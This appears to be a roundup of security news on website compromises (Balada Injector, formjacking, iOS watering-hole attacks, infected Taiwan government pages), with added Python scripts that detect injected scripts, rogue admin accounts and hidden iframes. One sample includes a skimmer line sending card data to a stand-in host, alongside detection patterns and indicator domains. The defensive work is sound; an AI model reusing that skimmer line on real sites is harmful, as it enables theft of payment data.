
Over 17,000 Websites Exploited in Massive Balada Injector Campaign

 

Over 17,000 WordPress websites have been compromised as a result of the notorious Balada Injector attack. The Balada Injector, discovered in 2022 but thought to have been active since 2017, weaponizes vulnerabilities in premium WordPress themes and plugins to install malicious backdoors. 

Following infection, these backdoors redirect website users to fake tech help pages, bogus lottery winnings, fraudulent push notification hoaxes, and other scams. 

With such a wide range of deceptive techniques, experts believe that Balada Injector is either a service offered to other threat actors or a direct component of a scam operation. 

The recent wave of attacks is being blamed on the tagDiv Composer plugin's CVE-2023-3169 cross-site scripting (XSS) vulnerability. This plugin is found on an estimated 155,000 websites with the Newspaper and Newsmag WordPress themes, both premium products, laying the groundwork for possible attacks. 

This wave of the campaign started in September, following the public disclosure of the vulnerability and the publication of a proof-of-concept.

In a recent analysis, website security firm Sucuri exposed the extent of the infiltration, citing specific indicators of the attack, such as malicious script injected within separate tags. Sucuri discovered six different attack waves:

  • Over 5,000 websites were compromised by malicious script injections from stay.decentralappps[.]com.
  • Rogue WordPress administrator accounts were created, at first with the login "greeceman" and later with names automatically generated from each website's hostname.
  • Persistence was gained covertly by using the WordPress theme editor to modify the 404.php file of the Newspaper theme.
  • A deceptive wp-zexit plugin was installed, which emulates legitimate WordPress administrator activity.
  • Three new malicious domains with heavier obfuscation were introduced, complicating detection attempts.
  • promsmotion[.]com subdomains replaced the preceding domain, with three distinct injection methods discovered on a total of 235 websites.

The CVE-2023-3169 vulnerability was used to compromise over 9,000 of the 17,000 compromised sites, demonstrating the attackers' tremendous effectiveness and ability to adapt quickly for maximum impact. 

Webmasters and site owners should immediately upgrade the tagDiv Composer plugin to version 4.2 or later, which addresses the known flaw. Regular upgrades to themes, plugins, and all website components remain critical in protecting against such formidable threats.
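The indicators listed above (the two injection domains, the "greeceman" and hostname-derived administrator accounts, the wp-zexit plugin and a modified Newspaper 404.php) can be turned into a simple site-state check. The following is an added example, not Sucuri's tooling or code from the original post: it runs over a constructed snapshot of a WordPress install (file contents, administrator names, plugin slugs and a known-good hash of 404.php). The hostname-derived username patterns and the sample site content are assumptions of this example.

```python
import hashlib
import re

# Indicators taken from the Sucuri findings summarized above.
INJECTION_DOMAINS = ("stay.decentralappps.com", "promsmotion.com")
ROGUE_ADMIN = "greeceman"
ROGUE_PLUGIN = "wp-zexit"
NEWSPAPER_404 = "wp-content/themes/Newspaper/404.php"

# Host part of any <script src=...> reference (http, https or protocol-relative).
SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.I)


def host_matches(host, domains):
    """True if host is one of the listed domains or a subdomain of one."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in domains)


def find_injected_scripts(path, content):
    return [f"{path}: script loaded from {m.group(1)}"
            for m in SCRIPT_SRC.finditer(content)
            if host_matches(m.group(1), INJECTION_DOMAINS)]


def check_admins(admins, site_host):
    # Assumption of this example (not from the write-up): hostname-derived names are
    # the bare first label, the full host, or the host with dots stripped/replaced.
    h = site_host.lower()
    derived = {h, h.split(".")[0], h.replace(".", ""), h.replace(".", "_")}
    findings = []
    for user in admins:
        u = user.lower()
        if u == ROGUE_ADMIN:
            findings.append(f"admin '{user}' matches the known Balada username")
        elif u in derived:
            findings.append(f"admin '{user}' is derived from the site hostname")
    return findings


def check_plugins(plugins):
    return [f"plugin '{p}' is the rogue {ROGUE_PLUGIN} plugin"
            for p in plugins if p.lower() == ROGUE_PLUGIN]


def check_theme_404(content, known_good_sha256):
    """Compare the live 404.php against the hash of a clean copy of the theme file."""
    digest = hashlib.sha256(content.encode()).hexdigest()
    if digest != known_good_sha256:
        return [f"{NEWSPAPER_404}: sha256 {digest[:12]}... differs from the known-good copy"]
    return []


def scan_site(site):
    findings = []
    for path, content in sorted(site["files"].items()):
        findings += find_injected_scripts(path, content)
    findings += check_admins(site["admins"], site["host"])
    findings += check_plugins(site["plugins"])
    if NEWSPAPER_404 in site["files"]:
        findings += check_theme_404(site["files"][NEWSPAPER_404], site["known_good_404_sha256"])
    return findings


# Constructed sample: a clean 404.php as shipped, and a snapshot of an infected site.
CLEAN_404 = "<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n"
SAMPLE_SITE = {
    "host": "examplenews.org",
    "admins": ["editor", "greeceman", "examplenews"],
    "plugins": ["akismet", "wp-zexit"],
    "known_good_404_sha256": hashlib.sha256(CLEAN_404.encode()).hexdigest(),
    "files": {
        "index.html": '<html><head><script src="https://stay.decentralappps.com/js/f.js"></script></head></html>',
        NEWSPAPER_404: CLEAN_404 + '<script src="//cdn.promsmotion.com/x.js"></script>\n',
        "wp-content/themes/Newspaper/header.php": '<script src="/wp-includes/js/jquery.js"></script>',
    },
}

if __name__ == "__main__":
    for line in scan_site(SAMPLE_SITE):
        print("FINDING:", line)
```

The known-good hash should come from a pristine copy of the theme (a fresh download from the vendor), not from the live site, since the theme editor writes straight into the served file. Run the same checks after upgrading tagDiv Composer: patching closes the entry point but does not remove accounts, plugins or file changes that were already added.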

Cyberattacks Targeting Websites Using WordPress

Thirty Ukrainian universities were hacked in a targeted cyberattack supporting Russia's attack on Ukraine. In its latest report, experts from Wordfence said the attack had massive repercussions on Ukrainian education organizations and attributed it to a hacking group known as the Monday Group, which has openly supported Russia's invasion of Ukraine. The members of the group, who identify themselves as 'the Mxonday', have attacked WordPress-hosted websites over the past two weeks, since the start of the Russian invasion of Ukraine.


As per the Wordfence blog, the firm protects more than 8,000 Ukrainian websites, around 300 of which belong to educational organizations. Wordfence also protects government, police, and military websites. The security firm also mentioned that it saw a rise to 144,000 cyberattacks on February 25, the second day of the kinetic attack. That is three times the regular attack volume seen at the start of the month across the Ukrainian websites that Wordfence protects. According to founder and CEO Mark Maunder, a threat actor was continuously trying to attack Ukrainian websites immediately after the invasion of Ukraine began.

An inquiry into the issue found four IP addresses associated with the campaign, distributed through a VPN service in Sweden. The hacking group also has ties with Brazil, which Wordfence suspects is where the group operates from, but the threat actors behind the attack are yet to be identified. The report comes after new ESET research that described various malware families used in targeted cyberattacks against organizations in Ukraine. An ESET blog reported a destructive campaign that used HermeticWiper against several organizations.

The cyberattacks comprised three elements: HermeticWiper, which corrupts a system and renders it inoperable; HermeticWizard, which spreads HermeticWiper across the local network via WMI and SMB; and lastly HermeticRansom. According to the blog, the cyberattack preceded the start of the Russian invasion of Ukraine by a few hours. The malware used in these attacks suggests that the campaign was planned months in advance. HermeticWiper has been found on hundreds of systems in at least five Ukrainian organizations, says ESET. It also mentioned that no tangible connection with a known threat actor has been found yet.

Indian users third most affected by Formjacking attacks, after the US and Australia


After the US and Australia, Indian users were the third most exposed to formjacking attacks, according to a new report by cybersecurity firm Symantec, which blocked over 2.3 million formjacking attacks globally in the second quarter of 2019.

In 2018, American users faced 33% of all formjacking attacks; during the first half of 2019, however, they became the most exposed to these attacks, with more than 50% of all global detections. India, with 5.7% of all global attacks, ranks third, as per the Symantec report.

Formjacking, a dangerous new threat, operates by infecting websites with malicious code, mainly websites where users fill out job applications, government forms, and credit card details. Symantec carried out a comprehensive analysis of formjacking attacks in its Internet Security Threat Report (ISTR), which calls attention to the ways users and websites have been affected by this critical cyber threat in 2018-19.

“We expect this formjacking trend to continue and expand further to steal all kinds of data from web forms, not just payment card data. This also means that we are likely to see more software supply chain attacks. Unfortunately, formjacking is showing no signs of disappearing any time soon. Therefore, operators of online stores need to be aware of the risk and protect their online presence,” reads the report.

How ‘Formjacking’ Works

To inject malicious JavaScript into a website, attackers modify one of the JavaScript files that is loaded along with the site. The malicious code then alters the behavior of the targeted web form on the infected site, which allows the attackers to unlawfully acquire credit card data and other sensitive information as it is entered.
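Because the attack works by silently changing a script the site already serves, the defender's counterpart is a deploy-time hash baseline of every first-party script, checked against what is actually served (and published as Subresource Integrity values so browsers refuse altered copies). The following is an added example, not Symantec's or any vendor's code: `build_baseline`, `compare` and `script_tag` are names chosen here, the skimmer heuristic in `skimmer_hints` is an assumption of this example rather than a Symantec signature, and the script bodies are constructed sample input.

```python
import base64
import hashlib
import re


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value for a script body, e.g. 'sha384-<base64 digest>'."""
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """Emit a script tag pinned to the deployed body; a modified copy will not load."""
    return f'<script src="{src}" integrity="{sri_hash(body)}" crossorigin="anonymous"></script>'


def build_baseline(scripts):
    """Record the hash of every first-party script at deploy time."""
    return {name: sri_hash(body) for name, body in scripts.items()}


# Heuristic (an assumption of this example): a modified script that both reads form
# fields and sends data to an absolute URL on another host deserves a closer look.
READS_FORMS = re.compile(r"document\.forms|\.value\b|querySelector(?:All)?\([^)]*(?:input|form)", re.I)
SENDS_DATA = re.compile(r"(?:fetch|XMLHttpRequest|sendBeacon|new Image)\b.*?https?://([a-z0-9.-]+)", re.I | re.S)


def skimmer_hints(body: bytes, site_host: str):
    """Return external hosts a form-reading script sends to, or [] if nothing matches."""
    text = body.decode("utf-8", errors="replace")
    hosts = {m.group(1).lower() for m in SENDS_DATA.finditer(text)}
    external = sorted(h for h in hosts if h != site_host.lower())
    return external if READS_FORMS.search(text) and external else []


def compare(baseline, current, site_host):
    """Diff served scripts against the baseline; modified entries carry skimmer hints."""
    report = {"modified": {}, "added": [], "removed": []}
    for name, body in current.items():
        if name not in baseline:
            report["added"].append(name)
        elif sri_hash(body) != baseline[name]:
            report["modified"][name] = skimmer_hints(body, site_host)
    report["removed"] = [n for n in baseline if n not in current]
    return report


# Constructed sample: what was deployed, and what the web server is now serving.
DEPLOYED = {
    "checkout.js": b"document.forms[0].addEventListener('submit', validate);\n",
    "vendor/analytics.js": b"fetch('https://shop.example/collect', {method: 'POST'});\n",
}
APPENDED = b"var d=document.forms[0].card.value; new Image().src='https://collect.example/p?d='+d;\n"
SERVED = dict(DEPLOYED)
SERVED["checkout.js"] = DEPLOYED["checkout.js"] + APPENDED

if __name__ == "__main__":
    baseline = build_baseline(DEPLOYED)
    print(script_tag("/js/checkout.js", DEPLOYED["checkout.js"]))
    print(compare(baseline, SERVED, "shop.example"))
```

Hash comparison is the reliable signal; the heuristic only prioritises which changed file to read first. The same comparison is what catches the third-party and supply-chain case the Symantec report anticipates, provided vendor scripts are also pinned to a reviewed version rather than loaded live from the vendor's host.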

According to Symantec's findings, websites affected by formjacking remain compromised for 46 days. A number of websites have fallen prey to formjacking, with publicly reported attacks on the websites of major companies like British Airways, Ticketmaster, Feedify, and Newegg.

Warning consumers around the globe, Candid Wueest, Principal Threat Researcher at Symantec, said, “Each month we discover thousands of formjacking infected websites, which generate millions of dollars for the cybercriminals."

"Consumers often don't notice that they have become a victim to a formjacking attack as it can happen on a trusted online store with the HTTPS padlock intact. Therefore, it is important to have a comprehensive security solution that can protect you against formjacking attacks," he added.

Google Project Zero Discovers Malicious Website Exploits which Affected iPhone Users



Researchers at Google Project Zero discovered an attack against iOS users that took the form of malware served from hacked websites.

The malware installed itself stealthily on the devices of users who visited any of the hacked websites, which had a readership in the thousands.

Once the malware is installed, it makes the iPhone act as a clandestine spying device which traces the contacts, location and messages, allowing hackers to get an overview of the victim's life and habits.

The malware extends its data collection to popular third-party apps such as Gmail, WhatsApp and Google Maps; it is configured to steal files and upload the owner's live location data.

Google's Project Zero division, a team of white-hat hackers that has discovered multiple bugs and vulnerabilities, said that these attacks were based on a series of hacked sites that indiscriminately disseminated malware to iOS users.

This series of attacks stands out because most attacks of this kind are narrowly targeted, whereas these affected anyone who happened to visit one of the hacked websites.

Explaining the issue, Ian Beer from Project Zero says, "Real users make risk decisions based on the public perception of the security of these devices. The reality remains that security protections will never eliminate the risk of attack if you're being targeted. To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group.

"All that users can do is be conscious of the fact that mass exploitation still exists and behave accordingly; treating their mobile devices as both integral to their modern lives, yet also as devices which when compromised, can upload their every action into a database to potentially be used against them."

Taiwan Government sites infected and used in Wire Transfer spam mails



Be careful while visiting Taiwan government websites: they may redirect you to a BlackHole Exploit Kit page. We have discovered three infected Taiwan government websites. The infection was initially identified by @Hulk_Crusader.

"h00p://www.tai**i.gov.tw/page-3.htm <- another Taiwan .gov site distributing malware. (Copies of Policies spam)" reads the tweet posted by the researcher. At EHN, I have discovered another infected government website.

The infected sites share the same URL pattern ('page-3.htm') and contain an iframe pointing to the BlackHole Exploit Kit page "podaruno**.ru".

(Screenshot: malicious script)
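An injected iframe of the kind described above is usually pointed at a host the site does not own and is styled so visitors never see it (zero or one-pixel dimensions, or `display:none`). The following is an added example, not code from EHN or from the researcher cited: it parses a page with the standard-library HTML parser and reports every iframe that is external to the site's own host or hidden. The page content, the site host and the exploit-kit hostname are constructed placeholders, not the domains from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> tag (self-closing ones included)."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})


def _dim(value):
    """Parse '1', '0px' etc. into an int; None if absent or not numeric."""
    try:
        return int(value.strip().rstrip("px").strip())
    except ValueError:
        return None


def is_hidden(attrs):
    style = attrs.get("style", "").replace(" ", "").lower()
    w, h = _dim(attrs.get("width", "")), _dim(attrs.get("height", ""))
    tiny = w is not None and h is not None and w <= 1 and h <= 1
    return "display:none" in style or "visibility:hidden" in style or tiny


def suspicious_iframes(html, site_host):
    """Return iframes that point off-site or are hidden, in document order."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for frame in parser.iframes:
        src = frame.get("src", "")
        host = urlparse(src).hostname or site_host  # relative src stays on the same host
        external = host.lower() != site_host.lower()
        hidden = is_hidden(frame)
        if external or hidden:
            findings.append({"src": src, "host": host, "external": external, "hidden": hidden})
    return findings


# Constructed sample page: a legitimate same-site embed, an injected hidden frame
# pointing at a placeholder exploit-kit host, and a visible third-party embed.
SITE_HOST = "agency.example"
SAMPLE_HTML = """
<html><body>
<iframe src="/embed/map" width="600" height="400"></iframe>
<iframe src="http://exploit-kit.example/index.php" width="1" height="1" style="visibility: hidden"></iframe>
<iframe src="https://videos.example/player?id=42" width="640" height="360"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for finding in suspicious_iframes(SAMPLE_HTML, SITE_HOST):
        print(finding)
```

External and hidden together is the pattern to triage first; an external but visible frame is normally a deliberate embed. Running this over every page that matches the shared URL pattern the post notes ('page-3.htm') is a quick way to find the other copies of the same injection.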

After a quick Google search, I came to know that the infected websites are being used in a Wire Transfer spam mail.

Good afternoon,

Your Wire Transfer Amount: USD 92,710.37
Transaction Report: View [Link_to_infected_page]
TEMIKA Heller,
The Federal Reserve Wire Network

The list of infected websites: